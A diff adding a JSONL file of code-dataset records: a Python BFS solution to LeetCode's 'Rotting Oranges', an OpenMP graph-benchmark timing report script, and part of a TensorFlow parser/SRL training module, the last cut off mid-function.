diff --git "a/1508.jsonl" "b/1508.jsonl" new file mode 100644--- /dev/null +++ "b/1508.jsonl" @@ -0,0 +1,778 @@ +{"seq_id":"359735254","text":"#\n# @lc app=leetcode id=994 lang=python3\n#\n# [994] Rotting Oranges\n#\n# https://leetcode.com/problems/rotting-oranges/description/\n#\n# algorithms\n# Easy (46.54%)\n# Total Accepted: 5.7K\n# Total Submissions: 12.3K\n# Testcase Example: '[[2,1,1],[1,1,0],[0,1,1]]'\n#\n# In a given grid, each cell can have one of three values:\n# \n# \n# the value 0 representing an empty cell;\n# the value 1 representing a fresh orange;\n# the value 2 representing a rotten orange.\n# \n# \n# Every minute, any fresh orange that is adjacent (4-directionally) to a rotten\n# orange becomes rotten.\n# \n# Return the minimum number of minutes that must elapse until no cell has a\n# fresh orange.  If this is impossible, return -1 instead.\n# \n# \n# \n# \n# Example 1:\n# \n# \n# \n# \n# Input: [[2,1,1],[1,1,0],[0,1,1]]\n# Output: 4\n# \n# \n# \n# Example 2:\n# \n# \n# Input: [[2,1,1],[0,1,1],[1,0,1]]\n# Output: -1\n# Explanation: The orange in the bottom left corner (row 2, column 0) is never\n# rotten, because rotting only happens 4-directionally.\n# \n# \n# \n# Example 3:\n# \n# \n# Input: [[0,2]]\n# Output: 0\n# Explanation: Since there are already no fresh oranges at minute 0, the\n# answer is just 0.\n# \n# \n# \n# \n# Note:\n# \n# \n# 1 <= grid.length <= 10\n# 1 <= grid[0].length <= 10\n# grid[i][j] is only 0, 1, or 2.\n# \n# \n# \n# \n# \n#\nfrom collections import deque\n\n\nclass Solution(object):\n def orangesRotting(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n self.minutes = 0\n origins = 0\n q = deque()\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == 1:\n origins += 1\n if grid[i][j] == 2:\n q.append((i, j))\n direction = [(1, 0), (-1, 0), (0, 1), (0, -1)]\n while q and origins > 0:\n l = len(q)\n self.minutes += 1\n for i in range(l):\n x, y = q.popleft()\n for delate_x, delate_y in direction:\n next_x, next_y = x + delate_x, y + delate_y\n if not self.judge(next_x, next_y, grid):\n continue\n grid[next_x][next_y] = 2\n origins -= 1\n if (next_x, next_y) not in q:\n q.append((next_x, next_y))\n return self.minutes if origins == 0 else -1\n \n def judge(self, x, y, grid):\n return x >= 0 and x < len(grid) and y >= 0 and y < len(grid[0]) and grid[x][y] == 1\n\n\nif __name__ == '__main__':\n s = Solution()\n grid = [[0,2]]\n print(s.orangesRotting(grid=grid))\n \n","sub_path":"Breadth-first Search/easy/994.rotting-oranges.py","file_name":"994.rotting-oranges.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"301353279","text":"import os\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib.mlab as mlab\nimport matplotlib.pyplot as plt\n\nDATASET = [4039,5000,5881,10000]\nPROCESSOR = [1,2,4,10,20,40]\n\nbfs_sequential = dict()\nbfs_parral = dict()\nbfs_overhead = dict()\n\npr_sequential = dict()\npr_parral = dict()\npr_overhead = dict()\n\nsssp_sequential = dict()\nsssp_parral = dict()\nsssp_overhead = dict()\n\nfor ds in DATASET:\n\tbfs_parral[ds] = dict()\n\tbfs_overhead[ds] = dict()\n\tpr_parral[ds] = dict()\n\tpr_overhead[ds] = dict()\n\tsssp_parral[ds] = dict()\n\tsssp_overhead[ds] = dict()\n\tfor p in PROCESSOR:\n\t\tbfs_parral[ds][p] = list()\n\t\tpr_parral[ds][p] = list()\n\t\tsssp_parral[ds][p] = list()\n\nbfs_openmp = open('./bfs/out_bfs_omp_1.txt','r')\nbfs_openmp_line = 
bfs_openmp.readlines()\n\npr_openmp = open('./pr/out_pr_omp_1.txt','r')\npr_openmp_line = pr_openmp.readlines()\n\nsssp_openmp = open('./sssp/out_sssp_omp_1.txt','r')\nsssp_openmp_line = sssp_openmp.readlines()\n\nindex = 0\nfor line in bfs_openmp_line:\n\tline = line.strip()\n\tif index == 0:\n\t\tbfs_sequential[4039] = float(line)\n\telif index == 1:\n\t\tbfs_sequential[5000] = float(line)\n\telif index == 2:\n\t\tbfs_sequential[5881] = float(line)\n\telif index == 3:\n\t\tbfs_sequential[10000] = float(line)\n\telse:\n\t\tindex_new = index - 4\n\t\toffset = index_new % 24 \n\t\tdataset_offset = (int) (offset / 6)\n\t\tprocessor_offset = offset - dataset_offset * 6\n\t\t# print(dataset_offset,processor_offset,line)\n\t\tbfs_parral[DATASET[dataset_offset]][PROCESSOR[processor_offset]].append(float(line))\n\n\tindex += 1\nindex = 0\nindex_n = 0\nfor line in pr_openmp_line:\n\tline = line.strip()\n\tif index % 2 == 1:\n\t\tif index_n == 0:\n\t\t\tpr_sequential[4039] = float(line)\n\t\telif index_n == 1:\n\t\t\tpr_sequential[5000] = float(line)\n\t\telif index_n == 2:\n\t\t\tpr_sequential[5881] = float(line)\n\t\telif index_n == 3:\n\t\t\tpr_sequential[10000] = float(line)\n\t\telse:\n\t\t\tindex_new = index_n - 4\n\t\t\toffset = index_new % 24\n\t\t\tdataset_offset = (int)(offset / 6)\n\t\t\tprocessor_offset = offset - dataset_offset * 6\n\t\t\t# print(index_new,dataset_offset,processor_offset,line)\n\t\t\tpr_parral[DATASET[dataset_offset]][PROCESSOR[processor_offset]].append(float(line))\n\t\tindex_n += 1\n\tindex += 1\n\nindex = 0\nfor line in sssp_openmp_line:\n\tline = line.strip()\n\tif index == 0:\n\t\tsssp_sequential[4039] = float(line)\n\telif index == 1:\n\t\tsssp_sequential[5000] = float(line)\n\telif index == 2:\n\t\tsssp_sequential[5881] = float(line)\n\telif index == 3:\n\t\tsssp_sequential[10000] = float(line)\n\telse:\n\t\tindex_new = index - 4\n\t\toffset = index_new % 24 \n\t\tdataset_offset = (int) (offset / 6)\n\t\tprocessor_offset = offset - dataset_offset * 6\n\t\t# print(dataset_offset,processor_offset,line)\n\t\tsssp_parral[DATASET[dataset_offset]][PROCESSOR[processor_offset]].append(float(line))\n\n\tindex += 1\n\n\nbfs_plot = dict()\nsssp_plot = dict()\npr_plot = dict()\n\nbfs_time_plot = dict()\npr_time_plot = dict()\nsssp_time_plot = dict()\n\nbfs_time_acc = dict()\npr_time_acc = dict()\nsssp_time_acc = dict()\n\nthread_cost = list()\nx = ['p=1','p=2','p=4','p=10','p=20','p=40']\nfor ds in DATASET:\n\tbfs_plot[ds] = list()\n\tsssp_plot[ds] = list()\n\tpr_plot[ds] = list()\n\n\tbfs_time_plot[ds] = dict()\n\tpr_time_plot[ds] = dict()\n\tsssp_time_plot[ds] = dict()\n\n\tbfs_time_acc[ds] = dict()\n\tpr_time_acc[ds] = dict()\n\tsssp_time_acc[ds] = dict()\t\n\n\tfor p in PROCESSOR:\n\t\t# print(pr_parral[ds][p])\n\t\tbfs_parral[ds][p] = round(sum(bfs_parral[ds][p])/len(bfs_parral[ds][p]),4)\n\t\tbfs_time_plot[ds][p] = bfs_parral[ds][p]\n\t\tbfs_time_acc[ds][p] = round(bfs_sequential[ds]/bfs_parral[ds][p],4)\n\n\t\tpr_parral[ds][p] = round(sum(pr_parral[ds][p])/len(pr_parral[ds][p]),4)\n\t\tpr_time_plot[ds][p] = pr_parral[ds][p]\n\t\tpr_time_acc[ds][p] = round(pr_sequential[ds]/pr_parral[ds][p],4)\n\n\t\tsssp_parral[ds][p] = round(sum(sssp_parral[ds][p])/len(sssp_parral[ds][p]),4)\n\t\tsssp_time_plot[ds][p] = sssp_parral[ds][p]\n\t\tsssp_time_acc[ds][p] = round(sssp_sequential[ds]/sssp_parral[ds][p],4)\n\n\t\t# print(sssp_parral[ds][p], sssp_sequential[ds])\n\t\tbfs_overhead[ds][p] = bfs_parral[ds][p] - round(bfs_sequential[ds] / p, 4)\n\t\tpr_overhead[ds][p] = 
pr_parral[ds][p] - round(pr_sequential[ds] / p, 4)\n\t\tsssp_overhead[ds][p] = sssp_parral[ds][p] - round(sssp_sequential[ds] / p, 4)\n\t\tif p == 1:\n\t\t\tif bfs_overhead[ds][p] > 0:\n\t\t\t\tthread_cost.append(bfs_overhead[ds][p])\n\t\t\tif pr_overhead[ds][p] > 0:\n\t\t\t\tthread_cost.append(pr_overhead[ds][p])\n\t\t\tif sssp_overhead[ds][p] > 0:\n\t\t\t\tthread_cost.append(sssp_overhead[ds][p])\n\t\tbfs_plot[ds].append(bfs_overhead[ds][p])\n\t\tpr_plot[ds].append(pr_overhead[ds][p])\n\t\tsssp_plot[ds].append(sssp_overhead[ds][p])\n\n\t\t# print(\"BFS\\tDATASET:\",ds,\"PROCESSOR:\",p,\"OVERHEAD:\",round(bfs_overhead[ds][p],4))\n\t\t# print(\"PR\\tDATASET:\",ds,\"PROCESSOR:\",p,\"OVERHEAD:\",round(pr_overhead[ds][p],4))\n\t\t# print(\"SSSP\\tDATASET:\",ds,\"PROCESSOR:\",p,\"OVERHEAD:\",round(sssp_overhead[ds][p],4))\n\t\t# print(\"sequntial: \",bfs_sequential[ds],\"parral: \",bfs_parral[ds][p] )\n\nthread_cost = sum(thread_cost)/len(thread_cost)\n\n\nprint (\"System + Thread cost, T(PARALLEL(WITH PROCESSOR = 1)) - T(SEQUENTIAL): \",round(thread_cost,4))\nprint()\nprint()\nprint(\"+\"*40+\"BFS TIME\"+\"+\"*41)\nprint ('----------| ',end=\"\")\nfor pn in PROCESSOR:\n\ttitle = str(pn)\n\tpre_s = int((10 - len(title))/2)\n\tafter_s = 10 - pre_s - len(title)\n\t# print(pre_s,after_s)\n\ttitle = pre_s * \" \" + title + after_s * \" \"\n\tprint(title,'| ',end = \"\")\nprint()\nfor vn in DATASET:\n\tfirstcolumn = \"var:\"+str(vn)\n\tpre = int((9 - len(firstcolumn))/2)\n\tfcolumn = pre * \" \"+firstcolumn\n\tfcolumn = fcolumn + (9-len(fcolumn)) * \" \" \n\tprint(fcolumn,\"| \", end = \"\")\n\tfor pn in PROCESSOR:\n\t\tif pn < vn:\n\t\t\ttitle = str(bfs_time_plot[vn][pn])\n\t\t\tpre_s = int((10-len(title))/2)\n\t\t\tafter_s = 10 - pre_s - len(title)\n\t\t\ttitle = pre_s * \" \" + title + after_s * \" \"\n\t\t\tprint(title,\"| \",end = \"\")\n\tprint()\n\nprint()\nprint()\nprint(\"+\"*38+\"BFS TIME ACC\"+\"+\"*39)\nprint ('----------| ',end=\"\")\nfor pn in PROCESSOR:\n\ttitle = str(pn)\n\tpre_s = int((10 - len(title))/2)\n\tafter_s = 10 - pre_s - len(title)\n\t# print(pre_s,after_s)\n\ttitle = pre_s * \" \" + title + after_s * \" \"\n\tprint(title,'| ',end = \"\")\nprint()\nfor vn in DATASET:\n\tfirstcolumn = \"var:\"+str(vn)\n\tpre = int((9 - len(firstcolumn))/2)\n\tfcolumn = pre * \" \"+firstcolumn\n\tfcolumn = fcolumn + (9-len(fcolumn)) * \" \" \n\tprint(fcolumn,\"| \", end = \"\")\n\tfor pn in PROCESSOR:\n\t\tif pn < vn:\n\t\t\ttitle = str(bfs_time_acc[vn][pn])\n\t\t\tpre_s = int((10-len(title))/2)\n\t\t\tafter_s = 10 - pre_s - len(title)\n\t\t\ttitle = pre_s * \" \" + title + after_s * \" \"\n\t\t\tprint(title,\"| \",end = \"\")\n\tprint()\n\nprint()\nprint()\nprint(\"+\"*41+\"PR TIME\"+\"+\"*41)\nprint ('----------| ',end=\"\")\nfor pn in PROCESSOR:\n\ttitle = str(pn)\n\tpre_s = int((10 - len(title))/2)\n\tafter_s = 10 - pre_s - len(title)\n\t# print(pre_s,after_s)\n\ttitle = pre_s * \" \" + title + after_s * \" \"\n\tprint(title,'| ',end = \"\")\nprint()\nfor vn in DATASET:\n\tfirstcolumn = \"var:\"+str(vn)\n\tpre = int((9 - len(firstcolumn))/2)\n\tfcolumn = pre * \" \"+firstcolumn\n\tfcolumn = fcolumn + (9-len(fcolumn)) * \" \" \n\tprint(fcolumn,\"| \", end = \"\")\n\tfor pn in PROCESSOR:\n\t\tif pn < vn:\n\t\t\ttitle = str(pr_time_plot[vn][pn])\n\t\t\tpre_s = int((10-len(title))/2)\n\t\t\tafter_s = 10 - pre_s - len(title)\n\t\t\ttitle = pre_s * \" \" + title + after_s * \" \"\n\t\t\tprint(title,\"| \",end = \"\")\n\tprint()\n\nprint()\nprint()\nprint(\"+\"*39+\"PR TIME 
ACC\"+\"+\"*39)\nprint ('----------| ',end=\"\")\nfor pn in PROCESSOR:\n\ttitle = str(pn)\n\tpre_s = int((10 - len(title))/2)\n\tafter_s = 10 - pre_s - len(title)\n\t# print(pre_s,after_s)\n\ttitle = pre_s * \" \" + title + after_s * \" \"\n\tprint(title,'| ',end = \"\")\nprint()\nfor vn in DATASET:\n\tfirstcolumn = \"var:\"+str(vn)\n\tpre = int((9 - len(firstcolumn))/2)\n\tfcolumn = pre * \" \"+firstcolumn\n\tfcolumn = fcolumn + (9-len(fcolumn)) * \" \" \n\tprint(fcolumn,\"| \", end = \"\")\n\tfor pn in PROCESSOR:\n\t\tif pn < vn:\n\t\t\ttitle = str(pr_time_acc[vn][pn])\n\t\t\tpre_s = int((10-len(title))/2)\n\t\t\tafter_s = 10 - pre_s - len(title)\n\t\t\ttitle = pre_s * \" \" + title + after_s * \" \"\n\t\t\tprint(title,\"| \",end = \"\")\n\tprint()\n\n\nprint()\nprint()\nprint(\"+\"*40+\"SSSP TIME\"+\"+\"*40)\nprint ('----------| ',end=\"\")\nfor pn in PROCESSOR:\n\ttitle = str(pn)\n\tpre_s = int((10 - len(title))/2)\n\tafter_s = 10 - pre_s - len(title)\n\t# print(pre_s,after_s)\n\ttitle = pre_s * \" \" + title + after_s * \" \"\n\tprint(title,'| ',end = \"\")\nprint()\nfor vn in DATASET:\n\tfirstcolumn = \"var:\"+str(vn)\n\tpre = int((9 - len(firstcolumn))/2)\n\tfcolumn = pre * \" \"+firstcolumn\n\tfcolumn = fcolumn + (9-len(fcolumn)) * \" \" \n\tprint(fcolumn,\"| \", end = \"\")\n\tfor pn in PROCESSOR:\n\t\tif pn < vn:\n\t\t\ttitle = str(sssp_time_plot[vn][pn])\n\t\t\tpre_s = int((10-len(title))/2)\n\t\t\tafter_s = 10 - pre_s - len(title)\n\t\t\ttitle = pre_s * \" \" + title + after_s * \" \"\n\t\t\tprint(title,\"| \",end = \"\")\n\tprint()\n\nprint()\nprint()\nprint(\"+\"*38+\"SSSP TIME ACC\"+\"+\"*38)\nprint ('----------| ',end=\"\")\nfor pn in PROCESSOR:\n\ttitle = str(pn)\n\tpre_s = int((10 - len(title))/2)\n\tafter_s = 10 - pre_s - len(title)\n\t# print(pre_s,after_s)\n\ttitle = pre_s * \" \" + title + after_s * \" \"\n\tprint(title,'| ',end = \"\")\nprint()\nfor vn in DATASET:\n\tfirstcolumn = \"var:\"+str(vn)\n\tpre = int((9 - len(firstcolumn))/2)\n\tfcolumn = pre * \" \"+firstcolumn\n\tfcolumn = fcolumn + (9-len(fcolumn)) * \" \" \n\tprint(fcolumn,\"| \", end = \"\")\n\tfor pn in PROCESSOR:\n\t\tif pn < vn:\n\t\t\ttitle = str(sssp_time_acc[vn][pn])\n\t\t\tpre_s = int((10-len(title))/2)\n\t\t\tafter_s = 10 - pre_s - len(title)\n\t\t\ttitle = pre_s * \" \" + title + after_s * \" \"\n\t\t\tprint(title,\"| \",end = \"\")\n\tprint()\n'''' sssp '''\n\n'''ind = np.arange(len(x))\nwidth = 0.2\nfig, ax = plt.subplots()\ny1 = np.array(bfs_plot[4039])\ny2 = np.array(bfs_plot[5000])\ny3 = np.array(bfs_plot[5881])\ny4 = np.array(bfs_plot[10000])\nrects1 = ax.bar(ind, y1, width, color='r')\nrects2 = ax.bar(ind + width, y2, width, color='y')\nrects3 = ax.bar(ind + width * 2, y3, width, color='g')\nrects4 = ax.bar(ind + width * 3, y4, width, color='b')\n\nax.set_ylabel('Overhead')\nax.set_title('Overhead for BFS according to processor')\nax.set_xticks(ind + (width + width +width) / 2)\nax.set_xticklabels(('p:1', 'p:2', 'p:4', 'p:10', 'p:20','p:40'))\n\nax.legend((rects1,rects2,rects3,rects4), ('DS:4039','DS:5000','DS:5881','DS:10000'))\n\n# plt.show()\n\nfig, ax = plt.subplots()\ny1 = np.array(pr_plot[4039])\ny2 = np.array(pr_plot[5000])\ny3 = np.array(pr_plot[5881])\ny4 = np.array(pr_plot[10000])\nrects1 = ax.bar(ind, y1, width, color='r')\nrects2 = ax.bar(ind + width, y2, width, color='y')\nrects3 = ax.bar(ind + width * 2, y3, width, color='g')\nrects4 = ax.bar(ind + width * 3, y4, width, color='b')\n\nax.set_ylabel('Overhead')\nax.set_title('Overhead for PR according to 
processor')\nax.set_xticks(ind + (width + width +width) / 2)\nax.set_xticklabels(('p:1', 'p:2', 'p:4', 'p:10', 'p:20','p:40'))\n\nax.legend((rects1,rects2,rects3,rects4), ('pr:4039','pr:5000','pr:5881','pr:10000'))\n\n# plt.show()\n\nfig, ax = plt.subplots()\ny1 = np.array(sssp_plot[4039])\ny2 = np.array(sssp_plot[5000])\ny3 = np.array(sssp_plot[5881])\ny4 = np.array(sssp_plot[10000])\nrects1 = ax.bar(ind, y1, width, color='r')\nrects2 = ax.bar(ind + width, y2, width, color='y')\nrects3 = ax.bar(ind + width * 2, y3, width, color='g')\nrects4 = ax.bar(ind + width * 3, y4, width, color='b')\n\nax.set_ylabel('Overhead')\nax.set_title('Overhead for SSSP according to processor')\nax.set_xticks(ind + (width + width +width) / 2)\nax.set_xticklabels(('p:1', 'p:2', 'p:4', 'p:10', 'p:20','p:40'))\n\nax.legend((rects1,rects2,rects3,rects4), ('sssp:4039','sssp:5000','sssp:5881','sssp:10000'))'''\n\n# plt.show()\n\n\n\n\n\n\n","sub_path":"GraphApplication/omp_time_l.py","file_name":"omp_time_l.py","file_ext":"py","file_size_in_byte":11340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"427650503","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright 2016 Timothy Dozat\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport time\nimport pickle as pkl\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom lib import models\nfrom lib import optimizers\nfrom lib import rnn_cells\n\nfrom configurable import Configurable\nfrom vocab import Vocab\nfrom dataset import Dataset\nimport contextlib\nfrom subprocess import check_output, CalledProcessError\nimport operator\n\n@contextlib.contextmanager\ndef dummy_context_mgr():\n yield None\n\n#***************************************************************\nclass Network(Configurable):\n \"\"\"\"\"\"\n \n #=============================================================\n def __init__(self, model, *args, **kwargs):\n \"\"\"\"\"\"\n if args:\n if len(args) > 1:\n raise TypeError('Parser takes at most one argument')\n \n kwargs['name'] = kwargs.pop('name', model.__name__)\n super(Network, self).__init__(*args, **kwargs)\n if not os.path.isdir(self.save_dir):\n os.mkdir(self.save_dir)\n with open(os.path.join(self.save_dir, 'config.cfg'), 'w') as f:\n self._config.write(f)\n\n self._global_step = tf.Variable(0., trainable=False, name=\"global_step\")\n self._global_epoch = tf.Variable(0., trainable=False, name=\"global_epoch\")\n\n # todo what is this??\n # self._model = model(self._config, global_step=self.global_step)\n self._model = model(self._config)\n\n self._vocabs = []\n\n if self.conll:\n vocab_files = [(self.word_file, 1, 'Words', self.embed_size),\n (self.tag_file, [3, 4], 'Tags', self.embed_size if self.add_pos_to_input else 0),\n (self.rel_file, 7, 'Rels', 0)]\n elif self.conll2012:\n vocab_files = [(self.word_file, 3, 'Words', self.embed_size),\n 
(self.tag_file, [5, 4], 'Tags', self.embed_size if self.add_pos_to_input else 0), # auto, gold\n (self.rel_file, 7, 'Rels', 0),\n (self.srl_file, range(14, 50), 'SRLs', 0),\n (self.predicates_file, [10, 4] if self.joint_pos_predicates else 10,\n 'Predicates', self.predicate_embed_size if self.add_predicates_to_input else 0),\n (self.domain_file, 0, 'Domains', 0)]\n\n print(\"Loading vocabs\")\n sys.stdout.flush()\n for i, (vocab_file, index, name, embed_size) in enumerate(vocab_files):\n vocab = Vocab(vocab_file, index, embed_size, self._config,\n name=name,\n cased=self.cased if not i else True,\n use_pretrained=(not i))\n self._vocabs.append(vocab)\n\n print(\"Predicates vocab: \")\n for l, i in sorted(self._vocabs[4].iteritems(), key=operator.itemgetter(1)):\n print(\"%s: %d\" % (l, i))\n print(\"predicate_true_start_idx\", self._vocabs[4].predicate_true_start_idx)\n\n print(\"Loading data\")\n sys.stdout.flush()\n self._trainset = Dataset(self.train_file, self._vocabs, model, self._config, name='Trainset')\n self._validset = Dataset(self.valid_file, self._vocabs, model, self._config, name='Validset')\n self._testset = Dataset(self.test_file, self._vocabs, model, self._config, name='Testset')\n\n self._ops = self._gen_ops()\n self._save_vars = filter(lambda x: u'Pretrained' not in x.name, tf.global_variables())\n self.history = {\n 'train_loss': [],\n 'train_accuracy': [],\n 'valid_loss': [],\n 'valid_accuracy': [],\n 'test_acuracy': 0\n }\n return\n \n #=============================================================\n def train_minibatches(self):\n \"\"\"\"\"\"\n \n return self._trainset.get_minibatches(self.train_batch_size,\n self.model.input_idxs,\n self.model.target_idxs)\n \n #=============================================================\n def valid_minibatches(self):\n \"\"\"\"\"\"\n \n return self._validset.get_minibatches(self.test_batch_size,\n self.model.input_idxs,\n self.model.target_idxs,\n shuffle=False)\n \n #=============================================================\n def test_minibatches(self):\n \"\"\"\"\"\"\n \n return self._testset.get_minibatches(self.test_batch_size,\n self.model.input_idxs,\n self.model.target_idxs,\n shuffle=False)\n \n #=============================================================\n # assumes the sess has already been initialized\n def train(self, sess, profile):\n \"\"\"\"\"\"\n print(\"Training\")\n training_start_time = time.time()\n sys.stdout.flush()\n save_path = os.path.join(self.save_dir, self.name.lower() + '-pretrained')\n saver = tf.train.Saver(self.save_vars, max_to_keep=1, save_relative_paths=True)\n \n n_bkts = self.n_bkts\n train_iters = self.train_iters\n print_every = self.print_every\n validate_every = self.validate_every\n save_every = self.save_every\n current_best = 0.0\n try:\n train_time = 0\n train_loss = 0\n train_log_loss = 0\n train_roots_loss = 0\n train_cycle2_loss = 0\n train_svd_loss = 0\n train_rel_loss = 0\n train_srl_loss = 0\n train_mul_loss = {}\n train_predicate_loss = 0\n train_pos_loss = 0\n n_train_sents = 0\n n_train_correct = 0\n n_train_tokens = 0\n n_train_iters = 0\n n_train_srl_correct = 0\n n_train_srl_count = 0\n n_train_predicate_count = 0\n n_train_predicate_correct = 0\n total_train_iters = 0\n valid_time = 0\n valid_loss = 0\n valid_accuracy = 0\n while total_train_iters < train_iters:\n for j, (feed_dict, _) in enumerate(self.train_minibatches()):\n # train_inputs = feed_dict[self._trainset.inputs]\n train_targets = feed_dict[self._trainset.targets]\n\n start_time = time.time()\n\n if 
profile:\n pctx.trace_next_step()\n # Dump the profile to '/tmp/train_dir' after the step.\n pctx.dump_next_step()\n\n feed_dict[self._trainset.step] = total_train_iters\n\n _, loss, n_correct, n_tokens, roots_loss, cycle2_loss, svd_loss, log_loss, rel_loss, srl_loss, srl_correct, srl_count, predicate_loss, predicate_count, predicate_correct, pos_loss, pos_correct, multitask_losses, lr, sample_prob = sess.run(self.ops['train_op_srl'], feed_dict=feed_dict)\n total_train_iters += 1\n train_time += time.time() - start_time\n train_loss += loss\n train_log_loss += log_loss\n train_roots_loss += roots_loss\n train_cycle2_loss += cycle2_loss\n train_svd_loss += svd_loss\n train_rel_loss += rel_loss\n train_srl_loss += srl_loss\n train_pos_loss += pos_loss\n train_predicate_loss += predicate_loss\n n_train_predicate_count += predicate_count\n n_train_predicate_correct += predicate_correct\n\n for n, l in multitask_losses.iteritems():\n if n not in train_mul_loss.keys():\n train_mul_loss[n] = 0.\n train_mul_loss[n] += l\n\n n_train_sents += len(train_targets)\n n_train_correct += n_correct\n n_train_tokens += n_tokens\n n_train_srl_correct += srl_correct\n n_train_srl_count += srl_count\n n_train_iters += 1\n self.history['train_loss'].append(loss)\n self.history['train_accuracy'].append(100 * n_correct / n_tokens)\n if total_train_iters == 1 or total_train_iters % validate_every == 0:\n valid_time = 0\n valid_loss = 0\n n_valid_sents = 0\n n_valid_correct = 0\n n_valid_tokens = 0\n with open(os.path.join(self.save_dir, 'sanitycheck.txt'), 'w') as f:\n for k, (feed_dict, _) in enumerate(self.valid_minibatches()):\n inputs = feed_dict[self._validset.inputs]\n targets = feed_dict[self._validset.targets]\n start_time = time.time()\n loss, n_correct, n_tokens, predictions = sess.run(self.ops['valid_op'], feed_dict=feed_dict)\n valid_time += time.time() - start_time\n valid_loss += loss\n n_valid_sents += len(targets)\n n_valid_correct += n_correct\n n_valid_tokens += n_tokens\n self.model.sanity_check(inputs, targets, predictions, self._vocabs, f, feed_dict=feed_dict)\n valid_loss /= k+1\n valid_accuracy = 100 * n_valid_correct / n_valid_tokens\n valid_time = n_valid_sents / valid_time\n self.history['valid_loss'].append(valid_loss)\n self.history['valid_accuracy'].append(valid_accuracy)\n if print_every and total_train_iters % print_every == 0:\n train_loss /= n_train_iters\n train_log_loss /= n_train_iters\n train_roots_loss /= n_train_iters\n train_cycle2_loss /= n_train_iters\n train_svd_loss /= n_train_iters\n train_rel_loss /= n_train_iters\n train_srl_loss /= n_train_iters\n train_predicate_loss /= n_train_iters\n train_pos_loss /= n_train_iters\n train_accuracy = 100 * n_train_correct / n_train_tokens\n train_time = n_train_sents / train_time\n print('%6d) Train loss: %.4f Train acc: %5.2f%% Train rate: %6.1f sents/sec Learning rate: %f Sample prob: %f\\n'\n '\\tValid loss: %.4f Valid acc: %5.2f%% Valid rate: %6.1f sents/sec' %\n (total_train_iters, train_loss, train_accuracy, train_time, lr, sample_prob, valid_loss, valid_accuracy, valid_time))\n print('\\tlog loss: %f\\trel loss: %f\\tsrl loss: %f\\ttrig loss: %f\\tpos loss: %f' % (train_log_loss, train_rel_loss, train_srl_loss, train_predicate_loss, train_pos_loss))\n multitask_losses_str = ''\n for n, l in train_mul_loss.iteritems():\n train_mul_loss[n] = l/n_train_iters\n multitask_losses_str += '\\t%s loss: %f' % (n, train_mul_loss[n])\n print(multitask_losses_str)\n sys.stdout.flush()\n train_time = 0\n train_loss = 0\n n_train_sents = 
0\n n_train_correct = 0\n n_train_tokens = 0\n n_train_iters = 0\n train_log_loss = 0\n train_roots_loss = 0\n train_cycle2_loss = 0\n train_rel_loss = 0\n train_predicate_loss = 0\n train_srl_loss = 0\n n_train_srl_correct = 0\n n_train_srl_count = 0\n n_train_predicate_correct = 0\n n_train_predicate_count = 0\n if save_every and (total_train_iters % save_every == 0):\n elapsed_time_str = time.strftime(\"%d:%H:%M:%S\", time.gmtime(time.time()-training_start_time))\n print(\"Elapsed time: %s\" % elapsed_time_str)\n with open(os.path.join(self.save_dir, 'history.pkl'), 'w') as f:\n pkl.dump(self.history, f)\n # only look at non-viterbi decoding if we didn't train w/ crf\n current_score = 0.\n # if not self.viterbi_train:\n # correct = self.test(sess, validate=True)\n # current_score = correct[self.eval_criterion]\n if self.viterbi_decode or self.viterbi_train:\n correct = self.test(sess, viterbi=True, validate=True)\n else:\n correct = self.test(sess, validate=True)\n current_score = correct[self.eval_criterion]\n # las = np.mean(correct[\"LAS\"]) * 100\n # uas = np.mean(correct[\"UAS\"]) * 100\n # print('UAS: %.2f LAS: %.2f' % (uas, las))\n if self.save and current_score > current_best:\n current_best = current_score\n print(\"Writing model to %s\" % (os.path.join(self.save_dir, self.name.lower() + '-trained')))\n saver.save(sess, os.path.join(self.save_dir, self.name.lower() + '-trained'),\n latest_filename=self.name.lower(),\n global_step=self.global_epoch,\n write_meta_graph=False)\n if self.eval_parse:\n with open(os.path.join(self.save_dir, \"parse_results.txt\"), 'w') as parse_results_f:\n print(correct['parse_eval'], file=parse_results_f)\n # with open(os.path.join(self.save_dir, 'history.pkl'), 'w') as f:\n # pkl.dump(self.history, f)\n # self.test(sess, validate=True)\n sess.run(self._global_epoch.assign_add(1.))\n except KeyboardInterrupt:\n try:\n raw_input('\\nPress to save or to exit.')\n except:\n print('\\r', end='')\n sys.exit(0)\n # saver.save(sess, os.path.join(self.save_dir, self.name.lower() + '-trained'),\n # latest_filename=self.name.lower(),\n # global_step=self.global_epoch,\n # write_meta_graph=False)\n # with open(os.path.join(self.save_dir, 'history.pkl'), 'w') as f:\n # pkl.dump(self.history, f)\n # with open(os.path.join(self.save_dir, 'scores.txt'), 'a') as f:\n # pass\n self.test(sess, validate=True)\n return\n\n\n def convert_bilou(self, indices):\n strings = map(lambda i: self._vocabs[3][i], indices)\n converted = []\n started_types = []\n # print(strings)\n for i, s in enumerate(strings):\n label_parts = s.split('/')\n curr_len = len(label_parts)\n combined_str = ''\n Itypes = []\n Btypes = []\n for idx, label in enumerate(label_parts):\n bilou = label[0]\n label_type = label[2:]\n props_str = ''\n if bilou == 'I':\n Itypes.append(label_type)\n props_str = ''\n elif bilou == 'O':\n curr_len = 0\n props_str = ''\n elif bilou == 'U':\n # need to check whether last one was ended\n props_str = '(' + label_type + ('*)' if idx == len(label_parts) - 1 else \"\")\n elif bilou == 'B':\n # need to check whether last one was ended\n props_str = '(' + label_type\n started_types.append(label_type)\n Btypes.append(label_type)\n elif bilou == 'L':\n props_str = ')'\n started_types.pop()\n curr_len -= 1\n combined_str += props_str\n while 